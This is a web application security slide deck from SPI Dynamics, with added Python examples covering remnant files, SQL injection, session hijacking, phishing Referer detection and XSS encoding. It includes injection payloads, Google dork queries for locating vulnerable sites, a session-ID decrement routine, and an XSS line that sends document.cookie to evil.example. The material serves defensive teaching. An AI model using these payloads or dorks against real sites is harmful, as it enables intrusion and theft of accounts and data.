
Top Web App Attack Methods and How to Combat Them

Dennis Hurst, SPI Dynamics

Schedule:
9:30~10:00 Breakfast
10:00~11:30 Presentation
11:30~12:00 Break / Demo
Agenda

Who is SPI Dynamics
The Evolution of Web Applications and Why They Need to Be Secured
Web Application Vulnerabilities in Depth
Managing Web Application Vulnerabilities
Closing and Q&A

SPI Dynamics Confidential


SPI Dynamics

The expert in web application security testing and enterprise security risk management
Established market and thought leader
Introduction of product line for application lifecycle and AMP
Multiple patent applications completed and pending
Co-creator of the AVDL interoperability standard and other industry-leading consortiums

WebInspect assesses the security of applications and web services throughout the application lifecycle: Development, QA, Production, Audit

SPI Labs
Research and development group
Recognized as a leading authority on web application security



SPI Dynamics

Founded January 2000 by web application and security experts
Focused on the web application security testing and vulnerability assessment market
600+ customers
Noted as the fastest growing company (with 380% growth) by IDC in a December 2003 report by Charles J. Kolodgy
Strong in F500, federal and state government
#1 in customer growth, #1 in market share
[Chart: Annual Company Growth, customers and revenue, 2001-2004]



Selected Commercial Customers



Selected Government Customers



Web Sites

Simple, single-server solutions
[Diagram: Browser <-- HTML --> Web Server]



Web Applications

Very complex architectures, multiple platforms, multiple protocols
[Diagram: Browser and Wireless clients --> Web Servers (Presentation Layer, Media Store, Content Services) and Web Services --> Application Server (Business Logic, Access Controls, Transaction Information) --> Database Server (Customer Identification, Core Business Data)]



Web Applications Breach the Perimeter

[Diagram: Internet | DMZ | Trusted Inside | Corporate Inside]
Internet: the perimeter firewall blocks IMAP, FTP, SSH, TELNET and POP3 and only allows port 80 (or 443 SSL) traffic from the Internet to the web server. Any web server: port 80.
DMZ: web servers (IIS, SunOne, WebSphere, Apache), reached over HTTP(S)
Trusted Inside: application servers (ASP, .NET, Java); the firewall only allows applications on the web server to talk to the application server
Corporate Inside: database servers (SQL, Oracle, DB2); the firewall only allows the application server to talk to the database server
The application itself is the one path every firewall in the chain permits, so an attack carried in HTTP(S) passes straight through to the data.



Part Two

Web Application Vulnerabilities in Depth

Why Web Application Vulnerabilities Occur


Web Application Attack Methodologies



Why Web Application Risks Occur

The Web Application Security Gap

Security professionals don't know the applications: "As a network security professional, I don't know how my company's web applications are supposed to work, so I deploy a protective solution but don't know if it's protecting what it's supposed to."

Application developers and QA professionals don't know security: "As an application developer, I can build great features and functions while meeting deadlines, but I don't know how to develop my web application with security as a feature."



Web Application Vulnerabilities

Web application vulnerabilities occur in multiple areas.

Platform: Known Vulnerabilities

Administration: Extension Checking, Common File Checks, Data Extension Checking, Backup Checking, Directory Enumeration, Path Truncation, Hidden Web Paths, Forceful Browsing

Application: Application Mapping, Cookie Manipulation, Custom Application Scripting, Parameter Manipulation, Reverse Directory Traversal, Brute Force, Cookie Poisoning/Theft, Buffer Overflow, SQL Injection, Cross-site Scripting



Web Application Vulnerabilities

Platform (Known Vulnerabilities):
Known vulnerabilities can be exploited immediately with a minimum amount of skill or experience ("script kiddies")
Most easily defended of all web vulnerabilities
MUST have streamlined patching procedures
MUST have an inventory process



Web Application Vulnerabilities

Administration (Extension Checking, Common File Checks, Data Extension Checking, Backup Checking, Directory Enumeration, Path Truncation, Hidden Web Paths, Forceful Browsing):
Less easily corrected than known issues
Requires increased awareness
More than just configuration: must be aware of security flaws in the actual content
Remnant files can reveal the applications and versions in use
Backup files can reveal source code and database connection strings



Common file vulnerabilities

robots.txt
Lists the paths the administrator does not want search engines to crawl, which makes it one of the first files an attacker reads
Don't show confidential information in this file



Common file vulnerabilities

Web server logs and stats folders
A web-accessible web server log or stats folder reveals far too much about your web site (paths, parameters, client addresses, referers)



Demonstration 1: Common file vulnerabilities

Configuration files and remnant files
Remnant files are any files left on a web server that are not in use or not part of the web-based application.
Remnant files can include backup files, documentation files, default files (like samples) or any other file that is not part of the production system.
Remnant file solutions:
Never leave unnecessary files on a web server (e.g. Web.config.old)
Assume all files on a web server will be seen by a hacker.
Encrypt secure information in configuration files
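The common file and remnant file checks above are easy to turn into a repeatable audit. The following is an added example, not SPI Dynamics or WebInspect code: it generates the backup and editor-copy names an attacker probes for each known live path, reads the Disallow entries out of robots.txt as further hints, and reports which of those the server actually answers. The live paths, the robots.txt text and the set of paths the server returns 200 for are all constructed in the example so that it runs offline; in practice the `served` set is replaced by HTTP requests.

```python
# Added example, not SPI Dynamics code. The suffix and prefix lists are the usual
# editor, deployment and backup leftovers (an assumption; extend them for your stack).
REMNANT_SUFFIXES = (".bak", ".old", ".orig", ".save", ".tmp", ".swp", "~", ".txt", ".zip", ".1")
REMNANT_PREFIXES = ("Copy of ", "copy_of_", "_", ".", "#")
SOURCE_EXTS = (".config", ".asp", ".aspx", ".php", ".jsp", ".inc")   # files whose copies leak code or secrets


def remnant_candidates(path):
    """Names a scanner would probe for a known live file such as /web.config."""
    directory, _, name = path.rpartition("/")
    cands = [path + suffix for suffix in REMNANT_SUFFIXES]
    cands += [f"{directory}/{prefix}{name}" for prefix in REMNANT_PREFIXES]
    return cands


def robots_disallows(robots_txt):
    """Disallow entries from robots.txt: paths the owner wanted hidden, not protected."""
    paths = []
    for line in robots_txt.splitlines():
        line = line.split("#", 1)[0].strip()          # drop comments and whitespace
        key, _, value = line.partition(":")
        if key.strip().lower() == "disallow" and value.strip():
            paths.append(value.strip())
    return paths


def severity(live_path):
    """A served copy of source or configuration is worse than a stray document."""
    return "high" if live_path.lower().endswith(SOURCE_EXTS) else "medium"


def audit(live_paths, robots_txt, served):
    """Return findings as (severity, path, reason).  `served` stands in for the HTTP probe:
    the set of paths the server answers with 200 (constructed in this example)."""
    findings = []
    for path in live_paths:
        for cand in remnant_candidates(path):
            if cand in served:
                findings.append((severity(path), cand, f"remnant copy of {path} is served"))
    for path in robots_disallows(robots_txt):
        if path in served:
            findings.append(("medium", path, "path disclosed by robots.txt is reachable"))
        else:
            findings.append(("info", path, "path disclosed by robots.txt"))
    return findings


# Constructed sample data: what the application is known to deploy, a robots.txt, and the
# paths a (pretend) server returns 200 for.
LIVE_PATHS = ["/web.config", "/default.aspx", "/admin/login.aspx"]
ROBOTS_TXT = """# constructed robots.txt
User-agent: *
Disallow: /admin/
Disallow: /stats/
Disallow: /backup/db_export.zip
"""
SERVED = {"/default.aspx", "/admin/login.aspx", "/web.config.old", "/default.aspx.bak",
          "/admin/", "/stats/", "/backup/db_export.zip"}


def run_example():
    return audit(LIVE_PATHS, ROBOTS_TXT, SERVED)


if __name__ == "__main__":
    for sev, path, reason in run_example():
        print(f"{sev:6} {path:28} {reason}")
```

Run against a real host, the "served" set should be built from status codes and, for the high-severity hits, the body should be compared with the live file: a Web.config.old that the server hands back as plain text is exactly the connection-string disclosure the slide warns about.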



Demonstration 2: Configuration file vulnerabilities

Web Application Vulnerabilities

Application Programming (Application Mapping, Cookie Manipulation, Custom Application Scripting, Parameter Manipulation, Reverse Directory Traversal, Brute Force, Cookie Poisoning/Theft, Buffer Overflow, SQL Injection, Cross-site Scripting):
Common coding techniques do not necessarily include security
Input is assumed to be valid, but not tested
Inappropriate file calls can reveal source code and system files
Unexamined input from a browser can inject scripts into a page for replay against later visitors
Unhandled error messages reveal application and database structures
Unchecked database calls can be piggybacked with a hacker's own database call, giving direct access to business data through a web browser
SQL Injection

Cause: Using user-provided data to build a SQL statement without validating the data first

Goal:
Pass a SQL command to the web-based application and have that command executed on the database server
Use the exploit to steal data or damage/alter the database.



SQL Injection

Demo
Browser based
HTTP Based
Automated SQL Injection
Blind SQL Injection



SQL Injection Solution

Use parameterized queries

    using System.Data;
    using System.Data.SqlClient;
    // Parameter values travel separately from the SQL text, so input cannot change the statement's structure.
    using (SqlConnection cnn = new SqlConnection(connectionString /* database connection information here */))
    using (SqlCommand cmd = new SqlCommand("SELECT FirstName, LastName FROM Users "
            + "WHERE UserName = @uid AND password = @passwd", cnn))
    {
        cmd.Parameters.Add("@uid", SqlDbType.VarChar, 100).Value = uid;
        cmd.Parameters.Add("@passwd", SqlDbType.VarChar, 100).Value = passwd;
        cnn.Open();
        using (SqlDataReader reader = cmd.ExecuteReader()) { /* read FirstName, LastName */ }
    }

Trap your errors! Don't let the environment
Use stored procedures (a stored procedure that concatenates its arguments into dynamic SQL is still injectable)
Validate user input
Turn off default error messages
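The slide's fix is shown in C# against SQL Server; the following added example (not SPI Dynamics code) replays the same login query in Python against an in-memory SQLite table so that the before and after can be run side by side. It shows the three points on the slide: the concatenated query is bent by a comment payload and by a tautology, the parameterized query treats the same input as a literal string, and a raw driver error leaks structure (here the column count, which is what a UNION attack needs) until it is trapped and replaced with a generic message. The `Users` table, its rows and the payloads are constructed; `--` as a line comment is SQLite behaviour that SQL Server shares.

```python
import sqlite3

# Added example, not SPI Dynamics code.  Table and rows are constructed; column names
# follow the parameterized query on the slide.
SERVER_LOG = []          # stands in for the server-side log that never reaches the browser


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (UserName TEXT, password TEXT, FirstName TEXT, LastName TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?, ?, ?)",
                     [("alice", "s3cret", "Alice", "Smith"), ("bob", "hunter2", "Bob", "Jones")])
    return conn


def login_vulnerable(conn, uid, passwd):
    """The 'before': user input is spliced into the SQL text and can change the statement."""
    sql = ("SELECT FirstName, LastName FROM Users WHERE UserName = '" + uid
           + "' AND password = '" + passwd + "'")
    return conn.execute(sql).fetchall()


def login_parameterized(conn, uid, passwd):
    """The fix: placeholders; the driver sends the values separately from the SQL text."""
    sql = "SELECT FirstName, LastName FROM Users WHERE UserName = ? AND password = ?"
    return conn.execute(sql, (uid, passwd)).fetchall()


def login_with_raw_errors(conn, uid, passwd):
    """Vulnerable query AND the driver's error text handed back to the caller."""
    try:
        return {"rows": login_vulnerable(conn, uid, passwd), "error": None}
    except sqlite3.Error as exc:
        return {"rows": [], "error": str(exc)}      # reveals what went wrong and why


def login_hardened(conn, uid, passwd):
    """Parameterized query; any error is logged server-side and replaced by a fixed message."""
    try:
        return {"rows": login_parameterized(conn, uid, passwd), "error": None}
    except sqlite3.Error as exc:
        SERVER_LOG.append(repr(exc))
        return {"rows": [], "error": "Login failed"}


COMMENT_PAYLOAD = "alice' --"         # closes the string and comments out the password check
TAUTOLOGY_PAYLOAD = "x' OR '1'='1"    # makes the WHERE clause true for every row
PROBE_PAYLOAD = "' UNION SELECT 1 --"  # column-count probe; the error message answers it


def demo():
    conn = make_db()
    return {
        "comment_vuln": login_vulnerable(conn, COMMENT_PAYLOAD, "wrong"),
        "comment_param": login_parameterized(conn, COMMENT_PAYLOAD, "wrong"),
        "tautology_vuln": login_vulnerable(conn, TAUTOLOGY_PAYLOAD, TAUTOLOGY_PAYLOAD),
        "tautology_param": login_parameterized(conn, TAUTOLOGY_PAYLOAD, TAUTOLOGY_PAYLOAD),
        "probe_raw": login_with_raw_errors(conn, PROBE_PAYLOAD, "x"),
        "probe_hardened": login_hardened(conn, PROBE_PAYLOAD, "x"),
        "honest": login_parameterized(conn, "alice", "s3cret"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:16} {result}")
```

The parameterized version returns nothing for every payload because the whole string, quote and comment marker included, is compared against the `UserName` column as data. The error the raw variant returns for the UNION probe is the kind of message the slide's "turn off default error messages" bullet refers to: it tells the attacker how many columns to supply next time.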



Federal Trade Commission investigates Guess Inc.

"Guess Settles with FTC over Cyber Security Snafu", June 2003, by Kevin Poulsen for SecurityFocus

Guess.com was open to an "SQL injection attack," permitting anyone able to construct a properly-crafted URL to pull down every name, credit card number and expiration date in the site's customer database -- over 200,000 in all. The episode prompted a year-long FTC investigation into alleged deceptive trade practices by Guess.

"Consumers have every right to expect that a business that says it's keeping personal information secure is doing exactly that," said Howard Beales, Director of the FTC's consumer protection bureau, in a press release. "It's not just good business, it's the law."



Google Hacking

Find vulnerable sites using Google (old method, new life)
Example search queries:
filetype:mdb inurl:admin -- 180 results
filetype:xls inurl:admin -- 14,100 results
"ORA-00921: unexpected end of SQL command" -- 3,470 results
allintitle:"Netscape Enterprise Server Home Page" -- 431 results



Google Hacking

Take this method a step further and use it to narrow your attack victims:
inurl:id= filetype:asp site:gov -- 572,000 results
inurl:id= filetype:asp site:com -- 7,150,000 results
inurl:id= filetype:asp site:org -- 3,240,000 results

Use this list as a baseline for identifying SQL injection vulnerabilities




Google Hacking

Took 1 hour of coding
500 vulnerable sites were found in 1 minute and 26 seconds



Google Hacking

SQL Injection Worm
[Diagram: Find next victim -> Exploit victim -> Find next victim -> Exploit victim ...]



Session Hijacking

Review your account: find where the confidential data is



So Many Cookies

TestSess
Site cookie
Seg
TestPerm
ProfileAddressVerified
ProfileID
MEMUSER
USERID
SESSIONUSERID
PROFILE



Eliminate the cookies one at a time until only the ones that matter are left.
In this case: SESSIONUSERID=505741

Is the number incremental? Keep everything else the same and decrement the number: SESSIONUSERID=505740. If that returns another user's account, the session identifiers are predictable and any session can be hijacked.
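The cookie triage and the decrement test above are mechanical, so here they are as code. This is an added example, not SPI Dynamics code: the cookie names are the ones on the "So Many Cookies" slide with constructed values, the "server" is a stand-in function whose only real credential is SESSIONUSERID, and the valid session numbers are invented. It drops one cookie at a time to find the ones the server actually uses, checks whether the identifiers look sequential, walks the number up and down to see whose account comes back, and finally shows what the server should have issued instead.

```python
import secrets

# Added example, not SPI Dynamics code.  Everything below is constructed.
VALID_SESSIONS = {"505741": "alice", "505740": "bob", "505739": "carol"}


def server_lookup(cookies):
    """Account the site would show for this cookie jar, or None when not logged in.
    Stands in for the real site: only SESSIONUSERID is checked."""
    return VALID_SESSIONS.get(cookies.get("SESSIONUSERID"))


COOKIE_JAR = {  # the cookie names from the slide; values are made up
    "TestSess": "1", "Site cookie": "x", "Seg": "3", "TestPerm": "1",
    "ProfileAddressVerified": "Y", "ProfileID": "88", "MEMUSER": "alice",
    "USERID": "1001", "SESSIONUSERID": "505741", "PROFILE": "std",
}


def cookies_that_matter(cookies, check):
    """Drop one cookie at a time; keep those whose removal changes what the server returns."""
    baseline = check(cookies)
    return [name for name in cookies
            if check({k: v for k, v in cookies.items() if k != name}) != baseline]


def looks_sequential(ids, max_gap=10):
    """True when the observed identifiers are integers a few steps apart."""
    try:
        nums = sorted(int(i) for i in ids)
    except ValueError:
        return False            # not even numeric; nothing to decrement
    gaps = [b - a for a, b in zip(nums, nums[1:])]
    return bool(gaps) and all(0 < g <= max_gap for g in gaps)


def try_neighbours(session_id, check, width=2):
    """The hijack test from the slide: keep everything else the same, walk the number."""
    hits = {}
    n = int(session_id)
    for delta in range(-width, width + 1):
        if delta == 0:
            continue
        jar = dict(COOKIE_JAR, SESSIONUSERID=str(n + delta))
        account = check(jar)
        if account:
            hits[str(n + delta)] = account
    return hits


def new_session_id():
    """What the server should issue: 256 bits from the OS CSPRNG, not a counter."""
    return secrets.token_urlsafe(32)


if __name__ == "__main__":
    needed = cookies_that_matter(COOKIE_JAR, server_lookup)
    print("cookies the server really checks:", needed)
    print("sequential?", looks_sequential(["505741", "505740", "505739"]))
    print("neighbouring sessions:", try_neighbours("505741", server_lookup))
    print("unguessable replacement:", new_session_id())
```

Two sessions observed a minute apart are enough to tell a counter from a random token; in a real assessment the ids come from logging in twice, and the neighbour walk is done with a single request per candidate so the test itself cannot be mistaken for a brute-force attack.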



Phishing

Phishing Attacks

In computing, phishing is the fraudulent acquisition, through deception, of sensitive personal information such as passwords and credit card details, by masquerading as someone trustworthy with a real need for such information.
The term was coined in the mid 1990s by crackers attempting to steal AOL accounts. An attacker would pose as an AOL staff member and send an instant message to a potential victim. The message would ask the victim to reveal his or her password, for instance to "verify your account" or to "confirm billing information". Once the victim gave over the password, the attacker could access the victim's account and use it for criminal purposes, such as spamming.

Source: www.wikipedia.org
Phishing Defined

The word "phishing" comes from the analogy that Internet scammers are using email lures to "fish" for passwords and financial data from the sea of Internet users.
The term was coined in the 1996 timeframe by hackers who were stealing America On-Line accounts.
The first mention on the Internet of phishing is on the alt.2600 hacker newsgroup in January 1996.
Over the years, phishing attacks grew from simply stealing AOL dialup accounts into a more sinister criminal enterprise.

(source: www.antiphishing.org)



Phishing Stats

Number of active phishing sites reported in January 2005: 2560
Average monthly growth rate in phishing sites, July through January: 28%

(source: http://antiphishing.org/APWG_Phishing_Activity_Report-January2005.pdf)


Phishing Technical Review

[Diagram: phishing site http://www.fakeserver.com --> real site http://www.nubank.com]
The victim follows the lure, and the request that lands on the real site carries the phishing site in its Referer header:

    GET /default.asp HTTP/1.0
    Host: www.nubank.me
    Accept-Language: en-us,en;q=0.5
    Referer: http://www.fakenubank.me/
    Accept-Encoding: gzip,deflate
    Accept-Charset: ISO-8859-1,utf-8
    Keep-Alive: 300



Avoiding Phishing Attacks

Companies should NEVER send an email that asks users to log in and change their passwords via an embedded link.
This policy MUST be communicated to end users.
When critical account changes are made, send a verification email and lock the account until the change is verified.
Send a notification email to users when significant transactions are made.



Sample Letter to Customers

Company X Security

While the Internet is generally not a secure environment and no one can guarantee absolute security, Company X strives to provide our customers with a level of comfort about the security of the information they store and transmit through our Web site.

Beware of email scams. Do not respond to unsolicited emails asking you to validate your account information. If you receive a suspicious email or request for your personal information supposedly from Company X, please forward it to CustomerSecure@Company_X.com.



Identifying Phishing attacks

Bounced emails, LOTS of bounces: phishers send the lure as spam with your domain as the sender, so every bad address they guess bounces back to you
Notification from customers
Referer headers being sent from unknown or malicious Web sites, e.g. Referer: http://www.fakenubank.me/
Applications can track the Referer headers sent by users' browsers, detect phishing attacks and notify the user of the possible attack
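The Referer check in the last two bullets is simple to implement in the application or a log pipeline. The following is an added example, not SPI Dynamics code: it parses raw HTTP requests (the first sample is the request from the technical review above; the others are constructed), pulls the Referer host, and grades it. The bank's own hostnames, the trusted search-engine referers and the list of credential-handling paths are assumptions you would replace with your own.

```python
from urllib.parse import urlsplit

# Added example, not SPI Dynamics code.  All hostnames and sample requests are constructed.
OWN_HOSTS = {"nubank.me", "www.nubank.me"}                 # assumption: the site's own hosts
TRUSTED_REFERERS = {"www.google.com", "search.yahoo.com"}   # assumption: benign third parties
SENSITIVE_PATHS = ("/default.asp", "/login", "/account")    # assumption: where credentials go
BRAND = "nubank"                                            # a foreign host using this is a lure


def parse_request(raw):
    """Request line plus headers (names lower-cased) of one raw HTTP request."""
    lines = raw.strip().splitlines()
    method, path, _version = lines[0].split()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def classify(raw):
    """Return (severity, referer_host, reason) for one request."""
    method, path, headers = parse_request(raw)
    referer = headers.get("referer")
    if not referer:
        return ("none", None, "no Referer: typed URL or bookmark")
    host = (urlsplit(referer).hostname or "").lower()
    if host in OWN_HOSTS:
        return ("none", host, "internal navigation")
    if host in TRUSTED_REFERERS:
        return ("none", host, "known benign referer")
    if BRAND in host:
        return ("high", host, "foreign host using the brand name sent a visitor here")
    if path.startswith(SENSITIVE_PATHS):
        return ("medium", host, "unknown site deep-linking to a credential page")
    return ("low", host, "unknown referer")


def scan(requests):
    """Referer hosts worth acting on, with the worst severity seen for each."""
    rank = {"none": 0, "low": 1, "medium": 2, "high": 3}
    worst = {}
    for raw in requests:
        sev, host, _reason = classify(raw)
        if host and rank[sev] > rank[worst.get(host, "none")]:
            worst[host] = sev
    return {h: s for h, s in worst.items() if s != "none"}


SAMPLE_REQUESTS = [  # first one is the request from the slide; the rest are constructed
    "GET /default.asp HTTP/1.0\nHost: www.nubank.me\nReferer: http://www.fakenubank.me/\nKeep-Alive: 300\n",
    "GET /default.asp HTTP/1.0\nHost: www.nubank.me\nReferer: http://www.google.com/search?q=nubank\n",
    "GET /default.asp HTTP/1.0\nHost: www.nubank.me\n",
    "GET /rates.asp HTTP/1.0\nHost: www.nubank.me\nReferer: http://blog.example/best-banks\n",
]

if __name__ == "__main__":
    for raw in SAMPLE_REQUESTS:
        print(classify(raw))
    print(scan(SAMPLE_REQUESTS))
```

Referer is a hint, not a control: browsers omit it on typed URLs and across some HTTPS to HTTP transitions, and a phishing page can strip it with a meta refresh or a JavaScript redirect. Use the high-severity hits to warn the user on the page they have just reached and to start the takedown steps below, not to block the request.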



Responding to Phishing attacks

1. Attempt to determine who has been compromised by the attack and take appropriate action
2. Find out who is hosting the phishing Web site (use: http://www.samspade.org)
3. Send a cease and desist letter to the ISP that is hosting the phishing site
4. Contact Federal officials (FBI)



Session Summary

Session hijacking and phishing attacks are both ways that criminals attempt to steal users' credentials and possibly money
Minimizing the risk of these attacks requires understanding how your application works and recognizing the signs of a potential attack
Responding to an ongoing attack is possible but will require some amount of up-front work to be prepared



Phishing Resources
Individuals

www.ic3.gov -- Internet Crime Complaint Center
Established as a partnership between the FBI and the National White Collar Crime Center to provide a way to receive Internet-related criminal complaints and to research, develop and refer the criminal complaints to law enforcement agencies for any investigation they deem to be appropriate.



Phishing Resources
Companies

www.fbi.gov -- Federal Bureau of Investigation
Ask for the Cyber Crime Officer
Contact the FBI to report a phishing attack
www.antiphishing.org -- Anti-Phishing Working Group
The Anti-Phishing Working Group (APWG) is the global pan-industrial and law enforcement association focused on eliminating the fraud and identity theft that result from phishing, pharming and email spoofing of all types
Excellent resource for phishing information
www.digitalphishnet.org -- Digital PhishNet
The Digital PhishNet is a joint enforcement initiative between industry and law enforcement designed to ensnare those who perpetrate phishing attacks
Requires specific resources within a company



Cross Site Scripting (XSS)

Cross-site scripting (also known as XSS, or CSS in older writing) occurs when dynamically generated web pages display input that is not properly validated.
A user passes input in the form of a parameter to the web server.
The web server returns the user-provided input back to the user without proper encoding, so any script in that input runs in the browser of whoever views the page.



Demonstration 4: Cross site scripting (XSS) example (login.aspx)

XSS solutions
Fix:
Use validateRequest=false cautiously: ASP.NET request validation is a blocklist that rejects obviously dangerous input, not a substitute for output encoding
Server.HTMLEncode every user-supplied value before writing it into the page
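To make the two fixes concrete, here is an added example in Python, not SPI Dynamics code and not the login.aspx page from the demo: a stand-in login page that echoes the submitted username, first unencoded and then through `html.escape` (the standard-library equivalent of Server.HTMLEncode), in body, attribute and URL contexts. It also includes a one-pattern blocklist of the kind request validation applies, to show why "cautiously" is the right word: a nested payload survives one stripping pass intact. The payloads and page fragments are constructed.

```python
import html
from urllib.parse import quote

# Added example, not SPI Dynamics code.  A Python stand-in for the demo's login.aspx.


def body_vulnerable(username):
    """Echoes the submitted parameter straight into the page (the demo's bug)."""
    return "<p>Login failed for user " + username + "</p>"


def body_encoded(username):
    """Server.HTMLEncode equivalent: the browser shows the text, never parses it as markup."""
    return "<p>Login failed for user " + html.escape(username, quote=True) + "</p>"


def attr_vulnerable(username):
    """Same value reflected into a quoted attribute without encoding."""
    return '<input name="user" value="' + username + '">'


def attr_encoded(username):
    """Quotes must be encoded too, or the attacker closes the attribute and adds a handler."""
    return '<input name="user" value="' + html.escape(username, quote=True) + '">'


def link_encoded(username):
    """Inside a URL the right encoding is percent-encoding, not HTML encoding."""
    return '<a href="/profile?user=' + quote(username, safe="") + '">profile</a>'


def naive_filter(value):
    """A blocklist of the kind request validation applies: one pattern, one pass."""
    return value.replace("<script>", "")


# Constructed payloads.
COOKIE_THEFT = '<script>document.location="http://evil.example/?c="+document.cookie</script>'
NESTED = "<scr<script>ipt>alert(document.cookie)</script>"
ATTR_BREAKOUT = '" onfocus="alert(document.cookie)" autofocus="'


def attacker_markup_present(markup):
    """Crude check used by the tests: is there live markup the attacker controls?"""
    low = markup.lower()
    return "<script" in low or ' onfocus="' in low


if __name__ == "__main__":
    print(body_vulnerable(COOKIE_THEFT))
    print(body_encoded(COOKIE_THEFT))
    print(body_vulnerable(naive_filter(NESTED)))   # the filter rebuilt the tag
    print(attr_encoded(ATTR_BREAKOUT))
    print(link_encoded(COOKIE_THEFT))
```

Encode at the point of output, choosing the encoder for the context the value lands in; validation on the way in is still worthwhile for the fields where a whitelist is possible, but it is the encoding that makes the reflected value harmless.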



Part Three

Managing and Detecting Web Application Vulnerabilities
Changing the application development process
Assess in depth to defend in depth!
Manual vs. automated approach
WebInspect's approach



How the Industry Has Changed

1990s: zero liability
2004: Federal Trade Commission; regulatory requirements (GLB, HIPAA, SOX, CA 1386); legal precedents



Testing and verifying

Web application attacks come from many vectors
Application development is by nature an error (bug) prone process.
Some bugs will have a security aspect.
Testing for security bugs is critical.



Application Lifecycle Phases

Design: Auditors, Dev, and Business Subject Matter Experts (SME)
Development: Developers
Testing: QA and Developers
Production: Security Operations and Auditors


Application Lifecycle Phases

Audit: Auditors, Dev, Compliance, and Business Subject Matter Experts (SME)
Development: Developers
QA: QA and Developers
Production: Security Operations and Auditors



Secure Software Development Lifecycle
A Microsoft case study
Critical Components of Security
[Diagram: Creating Secure Applications rests on People, Process/SDL and Tools]



People
Providing Developers with the Guidance to Create Secure Applications



MSDN Developer Security Center
http://msdn.microsoft.com/security/



Process/SDL
Security Cannot be an Afterthought



Security Development Lifecycle (SDL)

A PROCESS by which Microsoft develops software and defines security requirements and milestones
Mandatory for products that are exposed to meaningful security risk
Evolving, and new factors, such as privacy, are being added

*Steve Lipner, Director of Security Engineering Strategy, Microsoft



Baseline Process vs. SDL Integrated

*Steve Lipner, Director of Security Engineering Strategy, Microsoft



Accountability and Incentives

Almost 40 percent of developers say that their companies do not think it is very
important to write secure applications

CIOs, CTOs, CSOs, and ITDMs say it is very important

Current incentives on performance and ship dates

Must be driven top-down



Early Results of the SDL

[Chart: Windows pre- and post-SDL critical and important security bulletins; SQL Server 2000 pre- and post-SDL security bulletins; Exchange Server 2000 pre- and post-SDL security bulletins. Values as extracted: 55, 17, 455]
http://msdn.microsoft.com/security/sdl



Tools
Visual Studio Team System Security Enhancements

[Screenshot callouts: "Hard to guess password!"; "String concat for dynamic SQL"; "Connecting as sysadmin"; "Telling the bad guy too much on failure"]



Summary

People
Guidance
Training
Accountability

Process
Security is an evolving challenge
The SDL process has proven effective at improving software security
As operating system security improves, attackers will move up the stack
Be ready to meet the challenge
http://msdn.microsoft.com/security/sdl

Tools
People cannot find all the defects



Application Lifecycle Phases

Development
Secure development training
Develop secure applications
Testing applications in development
QA
Testing for security bugs
Production / Security
Validating systems are secure prior to going live
Audit
Continued validation of production systems and processes
Establish remediation processes for production systems



Session Summary

Anything sent by a user to a web server, including parameters, headers, cookies, etc., can be modified.
Always validate input before using it or returning it to a user.
Application development is by its nature prone to bugs. It is critical that applications be tested to verify the absence of parameter-based vulnerabilities.



Detecting Web Application Vulnerabilities

Manual vs. Automatic Testing

Manual:
Time consuming
Expensive
Not repeatable
Rely on third-party individuals (penetration testers)

Automatic:
High performance, automated web application assessment
Cost effective
Scalable throughout the entire application lifecycle
Consistent, high-quality assessments
Provides economy of scale (SPI Labs)
Customizable (Custom Agents)



SPI Dynamics
Security Throughout the Application Development Lifecycle



Start Secure. Stay Secure.



Part Four

Closing and Q&A

Q&A
Break
WebInspect Demo
For a free 15 day trial of WebInspect please visit http://www.spidynamics.com

